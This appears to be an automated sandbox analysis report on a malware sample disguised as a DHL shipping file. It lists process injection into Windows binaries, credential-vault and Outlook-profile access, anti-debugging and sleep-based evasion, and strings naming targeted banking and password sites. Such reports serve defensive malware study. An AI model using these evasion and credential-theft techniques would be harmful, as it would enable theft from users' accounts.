            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 30312052024.exeStatic file information: File size 1208832 > 1048576
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 30312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3800818888.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000000.1605480285.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: DHL 30312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 30312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 30312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 30312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 30312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C04B37 LoadLibraryA,GetProcAddress,0_2_00C04B37
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C20739 push es; retn 5600h0_2_00C20753
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C28945 push ecx; ret 0_2_00C28958
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013E9331 push ebx; retf 0_2_013E933D
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013E9B31 push ebx; retf 0000h0_2_013E9B3D
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013E9AF1 push ebp; retf 0000h0_2_013E9B6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0283D push eax; iretd 2_2_03A02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A01366 push eax; iretd 2_2_03A01369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB225F pushad ; ret 4_2_02DB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB27FA pushad ; ret 4_2_02DB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB283D push eax; iretd 4_2_02DB2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE09AD push ecx; mov dword ptr [esp], ecx4_2_02DE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB1368 push eax; iretd 4_2_02DB1369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00612238 pushad ; iretd 4_2_00612239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0061AB37 push 00000038h; iretd 4_2_0061AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00616CB3 push ebx; iretd 4_2_00616E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00616E56 push ebx; iretd 4_2_00616E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00610EAB push ebp; retf 4_2_00610EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0061101F push es; iretd 4_2_00611027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00601126 push esp; ret 4_2_00601127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0061D1B0 push es; ret 4_2_0061D1D0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C048D7
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C85376
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C23187
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\DHL 30312052024.exeAPI/Special instruction interceptor: Address: 13ED064
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 405Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9567Jump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105780
            Source: C:\Users\user\Desktop\DHL 30312052024.exeAPI coverage: 4.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep count: 405 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep time: -810000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep count: 9567 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep time: -19134000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C6445A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C6D1 FindFirstFileW,FindClose,0_2_00C6C6D1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C6C75C
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6EF95
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6F0F2
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C6F3F3
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C637EF
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C63B12
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C6BCBC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0061BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0061BAB0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C049A0
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - EU WestVMware20,11696497155n
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: firefox.exe, 00000008.00000002.1833335768.000001EB4D75C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hange Transaction PasswordVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20,11696497155^
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696497155f
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169649
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3801646921.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964971
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C73F09 BlockInput,0_2_00C73F09
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C03B3A
